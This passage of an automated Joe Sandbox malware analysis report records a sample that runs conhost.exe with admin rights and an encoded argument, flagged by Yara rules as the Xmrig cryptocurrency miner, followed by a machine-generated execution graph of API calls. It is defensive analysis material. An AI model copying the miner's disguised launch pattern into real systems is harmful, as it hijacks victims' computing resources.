                                                                                                            Imagebase:0x7ff63b620000
                                                                                                            File size:576'000 bytes
                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:34
                                                                                                            Start time:13:39:51
                                                                                                            Start date:04/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\conhost.exe gzssianthtxzdggz 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvug8Rp3hiani4Twfqfj5pfOQ4C5/lIR+WrKX/39lFBfrYgVA5xlELaQrgfEYI/1+l+sm6d1wY+jp8lQ+gyInBZtRryf27JkgwVg8+gc8zt/+Qw/FqR21gXGsiWp5M1/PaUO8B8L/yFa9vhQOOMQzU9osOZwr+lVWCnvU0S6ajO3l3PA+IO3tZ+KIHzg9oJDykmRT9FPoLVpg3f2E+S/d4wYAneGaTBaw9u+h7ySSQW4uLa2RdrQlsNvaothGQq4OkU9/7weTT4gwdlFYcJqzkf6CrPgHCU2Z2X/1LqnGA0Z/oGM3RQZ3KFMH6aI6u72Mx/Roo9xz5ogo8pI2aMP1z57eBCyYbXyiGT0rCG540iwNf53KRDw5r+qu9TX7DnABrUnuCbtJtyaOErrfhHdH0mzc3oHhwbzk+xXdFEnj5LezfN80ibSpckaUWKu/Nc8n5n3862TFcZoV3+5pG7wnvACa9eswJk6IY7ANEpRFN9HJzRPurRT3aTK7NgnMwc4gmU=
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000022.00000002.2615840139.000002B9B4441000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000022.00000002.2615840139.000002B9B4427000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000022.00000002.2615840139.000002B9B44C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000022.00000002.2615840139.000002B9B43E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Has exited:false

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:10.4%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:19.7%
                                                                                                              Total number of Nodes:477
                                                                                                              Total number of Limit Nodes:4
                                                                                                              execution_graph 3894 7ff624ac4e70 3895 7ff624ac4e8f 3894->3895 3896 7ff624ac4ec6 fprintf 3895->3896 3622 7ff624ac80ee 3623 7ff624ac811d 3622->3623 3624 7ff624ac85a7 3622->3624 3631 7ff624ac6650 3623->3631 3626 7ff624ac8760 3628 7ff624ac877a 3626->3628 3629 7ff624ac6fb0 7 API calls 3626->3629 3629->3628 3630 7ff624ac80e4 3630->3624 3630->3626 3641 7ff624ac6fb0 3630->3641 3632 7ff624ac6775 3631->3632 3633 7ff624ac666c 3631->3633 3634 7ff624ac67ce fwprintf 3632->3634 3635 7ff624ac6795 fwprintf 3632->3635 3637 7ff624ac67a1 3632->3637 3633->3632 3640 7ff624ac668f 3633->3640 3634->3637 3635->3637 3636 7ff624ac66cb strlen 3649 7ff624acb270 3636->3649 3637->3630 3639 7ff624ac66a9 3639->3630 3640->3636 3640->3639 3642 7ff624ac6fc4 3641->3642 3643 7ff624ac7040 3642->3643 3644 7ff624ac7004 3642->3644 3673 7ff624ac67e0 3643->3673 3665 7ff624ac6a80 3644->3665 3647 7ff624ac704f 3647->3630 3648 7ff624ac7013 3648->3630 3650 7ff624acb29e 3649->3650 3653 7ff624acb100 3650->3653 3652 7ff624acb2cb 3652->3640 3654 7ff624acb233 3653->3654 3657 7ff624acb115 3653->3657 3654->3652 3655 7ff624acb1d1 3655->3652 3656 7ff624acb1b4 3659 7ff624acb1bf 3656->3659 3660 7ff624acb200 MultiByteToWideChar 3656->3660 3657->3655 3657->3656 3658 7ff624acb149 IsDBCSLeadByteEx 3657->3658 3663 7ff624acb164 3657->3663 3658->3656 3658->3663 3659->3652 3660->3655 3662 7ff624acb243 _errno 3660->3662 3661 7ff624acb18e MultiByteToWideChar 3661->3662 3664 7ff624acb1a8 3661->3664 3662->3655 3663->3655 3663->3661 3664->3652 3667 7ff624ac6aa2 3665->3667 3666 7ff624ac6c32 3666->3648 3667->3666 3668 7ff624ac6d30 3667->3668 3670 7ff624ac6b1b 3667->3670 3669 7ff624ac6880 4 API calls 3668->3669 3672 7ff624ac6c51 3668->3672 3669->3672 3670->3672 3677 7ff624ac6880 3670->3677 3672->3648 3674 7ff624ac67f4 3673->3674 3675 7ff624ac6650 7 API calls 3674->3675 3676 7ff624ac682e 3675->3676 3676->3647 3678 7ff624ac68b0 3677->3678 3680 7ff624ac688f 3677->3680 3679 7ff624acb270 4 API calls 3678->3679 3679->3680 3680->3672 3681 7ff624ac8df0 3682 7ff624ac8df9 3681->3682 3707 7ff624aca5c0 3682->3707 3684 7ff624ac8e0e 3685 7ff624ac8d40 3684->3685 3689 7ff624ac8eaf 3684->3689 3703 7ff624ac8ab0 3685->3703 3687 7ff624ac92b9 3688 7ff624ac8a80 6 API calls 3702 7ff624ac90bf 3688->3702 3689->3687 3690 7ff624ac9080 3689->3690 3691 7ff624ac92d1 3689->3691 3689->3702 3714 7ff624ac8a80 3690->3714 3691->3688 3691->3702 3693 7ff624aca7f0 6 API calls 3693->3702 3694 7ff624aca950 9 API calls 3694->3702 3695 7ff624ac9521 3696 7ff624ac8d70 3695->3696 3718 7ff624aca730 3695->3718 3698 7ff624aca5c0 6 API calls 3699 7ff624aca056 memcpy 3698->3699 3699->3702 3701 7ff624aca730 7 API calls 3701->3702 3702->3693 3702->3694 3702->3695 3702->3696 3702->3698 3702->3701 3724 7ff624acac10 3702->3724 3704 7ff624ac8ac3 3703->3704 3705 7ff624aca5c0 6 API calls 3704->3705 3706 7ff624ac8ae4 3705->3706 3706->3696 3731 7ff624aca4a0 3707->3731 3709 7ff624aca5d4 malloc 3712 7ff624aca610 3709->3712 3713 7ff624aca601 3709->3713 3711 7ff624aca643 LeaveCriticalSection 3711->3712 3712->3684 3713->3711 3713->3712 3715 7ff624ac8a8c 3714->3715 3716 7ff624aca5c0 6 API calls 3715->3716 3717 7ff624ac8aa4 3716->3717 3717->3702 3720 7ff624aca750 3718->3720 3719 7ff624aca77b 3719->3696 3720->3719 3721 7ff624aca5c0 6 API calls 3720->3721 3722 7ff624aca7ab 3721->3722 3722->3719 3723 7ff624aca7b3 memcpy 3722->3723 3723->3719 3725 7ff624acac5b 3724->3725 3726 7ff624acac2d 3724->3726 3727 7ff624aca5c0 6 API calls 3725->3727 3726->3725 3728 7ff624acad60 3726->3728 3730 7ff624acac69 3727->3730 3729 7ff624aca5c0 6 API calls 3728->3729 3729->3730 3730->3702 3730->3730 3732 7ff624aca4b4 3731->3732 3733 7ff624aca520 EnterCriticalSection 3731->3733 3735 7ff624aca4f1 InitializeCriticalSection InitializeCriticalSection 3732->3735 3737 7ff624aca4b8 3732->3737 3733->3737 3734 7ff624aca4db 3734->3709 3734->3713 3735->3737 3736 7ff624aca4c4 Sleep 3736->3736 3736->3737 3737->3733 3737->3734 3737->3736 3738 7ff624acb3f0 ___mb_cur_max_func ___lc_codepage_func 3739 7ff624acb100 4 API calls 3738->3739 3740 7ff624acb43d 3739->3740 3897 7ff624aca570 3898 7ff624aca585 3897->3898 3899 7ff624aca590 DeleteCriticalSection 3897->3899 3741 7ff624ac81e8 3742 7ff624ac81f4 3741->3742 3743 7ff624ac88ef wcslen 3742->3743 3744 7ff624ac821c 3742->3744 3748 7ff624ac3de0 3749 7ff624ac3cc0 23 API calls 3748->3749 3750 7ff624ac3e12 3749->3750 3751 7ff624ac4de0 3752 7ff624ac4df2 3751->3752 3754 7ff624ac4e02 3752->3754 3756 7ff624ac5940 3752->3756 3755 7ff624ac4e47 3757 7ff624ac59e5 3756->3757 3760 7ff624ac594e 3756->3760 3758 7ff624ac5a20 InitializeCriticalSection 3757->3758 3759 7ff624ac59ef 3757->3759 3758->3759 3759->3755 3761 7ff624ac5952 3760->3761 3762 7ff624ac59c1 DeleteCriticalSection 3760->3762 3763 7ff624ac59b0 free 3760->3763 3761->3755 3762->3761 3763->3762 3763->3763 3900 7ff624ac1560 3918 7ff624ac3b60 3900->3918 3902 7ff624ac157f 3903 7ff624ac1583 3902->3903 3904 7ff624ac1598 memset 3902->3904 3905 7ff624ac62f0 19 API calls 3904->3905 3906 7ff624ac15dc 3905->3906 3907 7ff624ac62f0 19 API calls 3906->3907 3908 7ff624ac15eb 3907->3908 3909 7ff624ac62f0 19 API calls 3908->3909 3910 7ff624ac167f 3909->3910 3911 7ff624ac62f0 19 API calls 3910->3911 3912 7ff624ac168e 3911->3912 3913 7ff624ac16e1 _wgetenv 3912->3913 3921 7ff624ac3c30 wcscpy 3913->3921 3919 7ff624ac3b77 memset wcscpy wcslen 3918->3919 3920 7ff624ac3c06 3918->3920 3919->3920 3920->3902 3922 7ff624ac3c60 wcscpy wcslen 3923 7ff624ac3c8d 3922->3923 3764 7ff624acb2e0 ___lc_codepage_func ___mb_cur_max_func 3765 7ff624acb321 3764->3765 3769 7ff624acb339 3764->3769 3768 7ff624acb3a0 3765->3768 3765->3769 3770 7ff624acb332 3765->3770 3766 7ff624acb100 4 API calls 3766->3768 3767 7ff624acb100 4 API calls 3767->3770 3768->3766 3768->3769 3770->3767 3770->3769 3924 7ff624ac875a 3925 7ff624ac6fb0 7 API calls 3924->3925 3926 7ff624ac877a 3925->3926 3771 7ff624ac11dc 3774 7ff624ac11e4 3771->3774 3772 7ff624ac146d 3773 7ff624ac124c SetUnhandledExceptionFilter 3773->3774 3774->3772 3774->3773 3775 7ff624ac12f3 malloc 3774->3775 3775->3774 3776 7ff624ac53db 3777 7ff624ac53e9 3776->3777 3779 7ff624ac52a3 3776->3779 3778 7ff624ac5222 3779->3778 3780 7ff624ac53b2 VirtualProtect 3779->3780 3780->3779 3491 7ff624ac3650 memset 3545 7ff624ac62f0 3491->3545 3493 7ff624ac36a2 3494 7ff624ac62f0 19 API calls 3493->3494 3495 7ff624ac36b1 3494->3495 3573 7ff624ac3c30 wcscpy 3495->3573 3497 7ff624ac3711 3498 7ff624ac3e80 26 API calls 3497->3498 3499 7ff624ac3719 memcpy 3498->3499 3500 7ff624ac62f0 19 API calls 3499->3500 3501 7ff624ac373f 3500->3501 3502 7ff624ac37f0 3501->3502 3503 7ff624ac3752 3501->3503 3504 7ff624ac62f0 19 API calls 3502->3504 3505 7ff624ac62f0 19 API calls 3503->3505 3506 7ff624ac37f5 memcpy 3504->3506 3507 7ff624ac3757 3505->3507 3506->3507 3508 7ff624ac3590 33 API calls 3507->3508 3509 7ff624ac37b2 3508->3509 3510 7ff624ac40e0 23 API calls 3509->3510 3511 7ff624ac37bf 3510->3511 3512 7ff624ac43a0 23 API calls 3511->3512 3513 7ff624ac37ca 3512->3513 3514 7ff624ac37db 3513->3514 3515 7ff624ac62f0 19 API calls 3513->3515 3516 7ff624ac3858 3515->3516 3517 7ff624ac62f0 19 API calls 3516->3517 3518 7ff624ac3867 3517->3518 3519 7ff624ac38bf wcsstr 3518->3519 3520 7ff624ac38cf 3519->3520 3521 7ff624ac38e4 3519->3521 3522 7ff624ac62f0 19 API calls 3521->3522 3523 7ff624ac3910 3522->3523 3524 7ff624ac62f0 19 API calls 3523->3524 3525 7ff624ac391f 3524->3525 3526 7ff624ac3977 wcsstr 3525->3526 3526->3520 3527 7ff624ac398b 3526->3527 3528 7ff624ac62f0 19 API calls 3527->3528 3529 7ff624ac3997 3528->3529 3530 7ff624ac62f0 19 API calls 3529->3530 3531 7ff624ac39a6 3530->3531 3532 7ff624ac39f4 wcsstr 3531->3532 3532->3520 3533 7ff624ac3a08 3532->3533 3534 7ff624ac62f0 19 API calls 3533->3534 3535 7ff624ac3a14 3534->3535 3536 7ff624ac62f0 19 API calls 3535->3536 3537 7ff624ac3a23 3536->3537 3538 7ff624ac3a71 wcsstr 3537->3538 3538->3520 3539 7ff624ac3a85 3538->3539 3540 7ff624ac62f0 19 API calls 3539->3540 3541 7ff624ac3acb 3540->3541 3542 7ff624ac62f0 19 API calls 3541->3542 3544 7ff624ac3ada 3542->3544 3543 7ff624ac3b3e wcsstr 3543->3514 3544->3543 3544->3544 3546 7ff624ac630e 3545->3546 3551 7ff624ac6328 3545->3551 3546->3493 3547 7ff624ac6331 GetLastError TlsGetValue SetLastError 3549 7ff624ac6410 3547->3549 3550 7ff624ac635f 3547->3550 3548 7ff624ac64ba 3548->3547 3552 7ff624ac64c7 3548->3552 3560 7ff624ac6430 3549->3560 3561 7ff624ac6543 abort 3549->3561 3553 7ff624ac636b 3550->3553 3550->3561 3564 7ff624ac6485 memset 3550->3564 3551->3547 3551->3548 3555 7ff624ac64a1 3551->3555 3556 7ff624ac64f2 3551->3556 3565 7ff624ac63bc 3551->3565 3552->3493 3553->3546 3557 7ff624ac6379 3553->3557 3554 7ff624ac651c WaitForSingleObject 3562 7ff624ac63ca 3554->3562 3581 7ff624ac6290 CreateSemaphoreW TlsAlloc 3555->3581 3559 7ff624ac650c 3556->3559 3556->3565 3574 7ff624ac61f0 3557->3574 3566 7ff624ac6510 Sleep 3559->3566 3567 7ff624ac6433 TlsSetValue 3560->3567 3572 7ff624ac6555 3561->3572 3562->3547 3562->3552 3569 7ff624ac63ef ReleaseSemaphore 3562->3569 3564->3567 3565->3548 3565->3554 3565->3562 3566->3566 3570 7ff624ac651a 3566->3570 3567->3553 3571 7ff624ac644a GetLastError 3567->3571 3568 7ff624ac6381 3568->3546 3569->3547 3570->3565 3571->3553 3572->3493 3575 7ff624ac6240 malloc 3574->3575 3576 7ff624ac6207 malloc 3574->3576 3577 7ff624ac6215 3575->3577 3578 7ff624ac6282 abort 3575->3578 3576->3577 3576->3578 3579 7ff624ac6228 memcpy 3577->3579 3580 7ff624ac626a memset 3577->3580 3579->3568 3580->3568 3582 7ff624ac62e0 GetLastError 3581->3582 3583 7ff624ac62c3 3581->3583 3582->3583 3584 7ff624ac62e8 abort 3583->3584 3585 7ff624ac62db 3583->3585 3585->3565 3781 7ff624ac5cd0 3782 7ff624ac5d60 3781->3782 3783 7ff624ac5ce7 3781->3783 3784 7ff624ac5d11 calloc 3783->3784 3785 7ff624ac5cf8 _assert 3783->3785 3784->3782 3786 7ff624ac5d28 TlsGetValue TlsSetValue 3784->3786 3785->3784 3930 7ff624ac8154 3931 7ff624ac8760 3930->3931 3932 7ff624ac80e4 3930->3932 3934 7ff624ac877a 3931->3934 3935 7ff624ac6fb0 7 API calls 3931->3935 3932->3930 3933 7ff624ac6fb0 7 API calls 3932->3933 3933->3932 3935->3934 3787 7ff624ac55c8 3788 7ff624ac55f1 3787->3788 3789 7ff624ac5653 3788->3789 3790 7ff624ac55ff 3788->3790 3791 7ff624ac5672 signal 3788->3791 3797 7ff624ac5645 3788->3797 3792 7ff624ac5660 3789->3792 3794 7ff624ac563c 3789->3794 3795 7ff624ac56b0 3789->3795 3790->3795 3796 7ff624ac5610 3790->3796 3790->3797 3793 7ff624ac5688 signal 3791->3793 3791->3794 3792->3791 3792->3794 3792->3797 3793->3797 3794->3797 3799 7ff624ac5760 signal 3794->3799 3795->3794 3795->3797 3798 7ff624ac56be signal 3795->3798 3796->3794 3796->3797 3801 7ff624ac5626 signal 3796->3801 3798->3794 3800 7ff624ac5779 signal 3798->3800 3799->3797 3800->3797 3801->3794 3802 7ff624ac5790 signal 3801->3802 3802->3797 3803 7ff624ac83c9 3804 7ff624ac8403 3803->3804 3805 7ff624ac83f0 3803->3805 3807 7ff624ac7440 7 API calls 3804->3807 3809 7ff624ac7440 3805->3809 3808 7ff624ac8799 3807->3808 3808->3808 3810 7ff624ac7454 3809->3810 3811 7ff624ac74c0 3810->3811 3812 7ff624ac748b 3810->3812 3813 7ff624ac67e0 7 API calls 3811->3813 3817 7ff624ac7360 3812->3817 3815 7ff624ac74cf 3813->3815 3815->3804 3818 7ff624ac7396 3817->3818 3819 7ff624ac6a80 4 API calls 3818->3819 3820 7ff624ac7401 3819->3820 3821 7ff624ac87c4 3822 7ff624ac8910 3821->3822 3824 7ff624ac87fe 3821->3824 3823 7ff624ac67e0 7 API calls 3822->3823 3825 7ff624ac8839 3823->3825 3824->3825 3826 7ff624ac67e0 7 API calls 3824->3826 3827 7ff624ac8a47 3826->3827 3828 7ff624ac67e0 7 API calls 3827->3828 3829 7ff624ac8a74 3828->3829 3829->3829 3942 7ff624ac8d40 3943 7ff624ac8d48 3942->3943 3944 7ff624ac8ab0 6 API calls 3943->3944 3945 7ff624ac8d70 3944->3945 3946 7ff624ac50b1 3947 7ff624ac50ba 3946->3947 3952 7ff624ac51c5 3946->3952 3948 7ff624ac5140 VirtualProtect 3947->3948 3950 7ff624ac50ce 3947->3950 3949 7ff624ac517c GetLastError 3948->3949 3948->3950 3951 7ff624ac5190 3949->3951 3833 7ff624ac1730 3834 7ff624ac175a 3833->3834 3838 7ff624ac1781 3833->3838 3835 7ff624ac62f0 19 API calls 3834->3835 3836 7ff624ac1772 3835->3836 3837 7ff624ac62f0 19 API calls 3836->3837 3837->3838 3838->3838 3953 7ff624ac4db0 3954 7ff624ac4db9 3953->3954 3955 7ff624ac4dbd 3954->3955 3956 7ff624ac5940 3 API calls 3954->3956 3957 7ff624ac4dd5 3956->3957 3958 7ff624ac80b4 3959 7ff624ac80b9 3958->3959 3960 7ff624ac81f4 3959->3960 3961 7ff624ac80d4 3959->3961 3963 7ff624ac88ef wcslen 3960->3963 3965 7ff624ac821c 3960->3965 3962 7ff624ac6e60 strlen 3961->3962 3964 7ff624ac80dc 3962->3964 3966 7ff624ac8760 3964->3966 3967 7ff624ac6fb0 7 API calls 3964->3967 3968 7ff624ac877a 3966->3968 3969 7ff624ac6fb0 7 API calls 3966->3969 3967->3964 3969->3968 3602 7ff624acb0b0 3603 7ff624acb0c0 3602->3603 3604 7ff624acb0c9 3602->3604 3606 7ff624ac5bc0 3603->3606 3607 7ff624ac5bd0 TlsGetValue 3606->3607 3608 7ff624ac5bc8 3606->3608 3613 7ff624ac5a40 3607->3613 3608->3604 3611 7ff624ac5a40 free 3612 7ff624ac5c14 3611->3612 3612->3604 3614 7ff624ac5a52 free 3613->3614 3615 7ff624ac5a6c TlsSetValue TlsFree 3613->3615 3614->3615 3615->3611 3970 7ff624ac86a8 localeconv 3971 7ff624acb270 4 API calls 3970->3971 3972 7ff624ac86e8 3971->3972 3842 7ff624ac5c20 3843 7ff624ac5cb5 3842->3843 3846 7ff624ac5c37 3842->3846 3844 7ff624ac5c61 calloc 3844->3843 3845 7ff624ac5c78 EnterCriticalSection LeaveCriticalSection 3844->3845 3846->3844 3976 7ff624ac58a0 3977 7ff624ac58b1 3976->3977 3978 7ff624ac58c0 EnterCriticalSection 3976->3978 3979 7ff624ac58f3 LeaveCriticalSection 3978->3979 3980 7ff624ac58d9 3978->3980 3982 7ff624ac5900 3979->3982 3980->3979 3981 7ff624ac58df free LeaveCriticalSection 3980->3981 3981->3982 3984 7ff624acaea0 3985 7ff624aca5c0 6 API calls 3984->3985 3986 7ff624acaebc 3985->3986 3850 7ff624ac6a18 3851 7ff624ac6a4d fwprintf 3850->3851 3852 7ff624ac6a1d 3850->3852 3855 7ff624ac6a36 3851->3855 3853 7ff624ac6a61 fwprintf 3852->3853 3854 7ff624ac6a2a fwprintf 3852->3854 3853->3855 3854->3855 3992 7ff624ac5298 3993 7ff624ac5222 3992->3993 3994 7ff624ac52a0 3992->3994 3994->3993 3995 7ff624ac53b2 VirtualProtect 3994->3995 3995->3994 3617 7ff624ac139c 3621 7ff624ac1224 3617->3621 3618 7ff624ac12f3 malloc 3618->3621 3619 7ff624ac146d 3620 7ff624ac124c SetUnhandledExceptionFilter 3620->3621 3621->3618 3621->3619 3621->3620 3586 7ff624ac4290 3591 7ff624ac3e80 wcslen 3586->3591 3590 7ff624ac42d3 3595 7ff624ac3eb0 3591->3595 3592 7ff624ac3ece memset wcscpy 3593 7ff624ac3cc0 23 API calls 3592->3593 3593->3595 3594 7ff624ac3f85 3596 7ff624ac3cc0 memset 3594->3596 3595->3592 3595->3594 3597 7ff624ac62f0 19 API calls 3596->3597 3598 7ff624ac3d0f 3597->3598 3599 7ff624ac62f0 19 API calls 3598->3599 3600 7ff624ac3d1e 3599->3600 3601 7ff624ac3d71 wcscpy wcscat wcslen 3600->3601 3601->3590 3856 7ff624ac1010 3857 7ff624ac104b 3856->3857 3858 7ff624ac106d __set_app_type 3857->3858 3859 7ff624ac1077 3857->3859 3858->3859 3863 7ff624ac5815 3864 7ff624ac5844 calloc 3863->3864 3865 7ff624ac5839 3863->3865 3864->3865 3866 7ff624ac585b EnterCriticalSection LeaveCriticalSection 3864->3866 4001 7ff624ac8d90 4002 7ff624ac8ab0 6 API calls 4001->4002 4003 7ff624ac8d71 4002->4003 3867 7ff624ac8311 3871 7ff624ac8338 3867->3871 3878 7ff624ac83c4 3867->3878 3868 7ff624ac8910 3869 7ff624ac67e0 7 API calls 3868->3869 3870 7ff624ac8839 3869->3870 3871->3868 3872 7ff624ac87fe 3871->3872 3876 7ff624ac8a47 3871->3876 3879 7ff624ac7650 3871->3879 3872->3870 3873 7ff624ac67e0 7 API calls 3872->3873 3873->3876 3874 7ff624ac67e0 7 API calls 3877 7ff624ac8a74 3874->3877 3876->3874 3877->3877 3878->3868 3878->3872 3881 7ff624ac766f 3879->3881 3880 7ff624ac7776 3880->3878 3881->3880 3882 7ff624ac6880 4 API calls 3881->3882 3882->3881 3883 7ff624ac5e00 3885 7ff624ac5e0f 3883->3885 3884 7ff624ac5e7e 3885->3884 3886 7ff624ac5e69 strncmp 3885->3886 3886->3884 3886->3885 4004 7ff624ac5a80 4005 7ff624ac5ad0 4004->4005 4006 7ff624ac5a8d 4004->4006 4007 7ff624ac5b70 InitializeCriticalSection TlsAlloc 4005->4007 4017 7ff624ac5ade 4005->4017 4008 7ff624ac5a91 4006->4008 4009 7ff624ac5af0 4006->4009 4007->4017 4010 7ff624ac5ac3 4008->4010 4011 7ff624ac5a96 TlsGetValue 4008->4011 4012 7ff624ac5b20 TlsGetValue 4009->4012 4013 7ff624ac5afc 4009->4013 4014 7ff624ac5a40 free 4011->4014 4016 7ff624ac5a40 free 4012->4016 4013->4010 4015 7ff624ac5b05 DeleteCriticalSection 4013->4015 4018 7ff624ac5ab1 TlsSetValue 4014->4018 4015->4010 4019 7ff624ac5b3b TlsSetValue 4016->4019 4018->4010 4020 7ff624ac5a40 free 4019->4020 4021 7ff624ac5b58 TlsFree 4020->4021 4021->4013 3887 7ff624ac84fd 3888 7ff624ac8506 3887->3888 3891 7ff624ac6e60 3888->3891 3892 7ff624ac6ea0 strlen 3891->3892 3893 7ff624ac6e85 3891->3893 3892->3893 3893->3892 4022 7ff624ac8477 4023 7ff624ac84b1 4022->4023 4024 7ff624ac849e 4022->4024 4026 7ff624ac74e0 9 API calls 4023->4026 4028 7ff624ac74e0 4024->4028 4027 7ff624ac87b8 4026->4027 4027->4027 4029 7ff624ac74f9 4028->4029 4030 7ff624ac7604 4029->4030 4031 7ff624ac7534 4029->4031 4032 7ff624ac67e0 7 API calls 4030->4032 4033 7ff624ac75a0 4031->4033 4037 7ff624ac7548 4031->4037 4034 7ff624ac7613 4032->4034 4035 7ff624ac75af 4033->4035 4036 7ff624ac75a4 strlen 4033->4036 4034->4023 4040 7ff624ac7360 4 API calls 4035->4040 4036->4035 4038 7ff624ac7550 4037->4038 4039 7ff624ac7624 strlen 4037->4039 4042 7ff624ac6a80 4 API calls 4038->4042 4039->4038 4041 7ff624ac75c4 4040->4041 4041->4023 4043 7ff624ac7567 4042->4043 4043->4023

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wcslen$memset$wcscpy$wcsncmp
                                                                                                              • String ID: 0$X$`
                                                                                                              • API String ID: 4021896446-2527496196
                                                                                                              • Opcode ID: 56a0066da786e4fd1d3496444c6abb71906578518ceb0cbf8390e57223bbe39d
                                                                                                              • Instruction ID: 12c38286cd534ffab04b923a2f24ae0aee77b0d846cb229305efba67bd039898
                                                                                                              • Opcode Fuzzy Hash: 56a0066da786e4fd1d3496444c6abb71906578518ceb0cbf8390e57223bbe39d
                                                                                                              • Instruction Fuzzy Hash: DA127222A08BC185E760CF29E8403EAB3A4FB95B94F145325DE98577DAEF7CD184CB41

                                                                                                              Control-flow Graph

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 04cda4702289d8e6771f7c6f1b5d55155f1df6a08e7de620e071111176c92c61
                                                                                                              • Instruction ID: 25f09e69d0c449f92bd1dd29c33acfb65fdd1a622e45cc7caa03c3617200c575
                                                                                                              • Opcode Fuzzy Hash: 04cda4702289d8e6771f7c6f1b5d55155f1df6a08e7de620e071111176c92c61
                                                                                                              • Instruction Fuzzy Hash: 56315874F0DB0680FF929B59ECD037923A5AF54B85F604036C91DCB3EBEE2DA4008A52

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
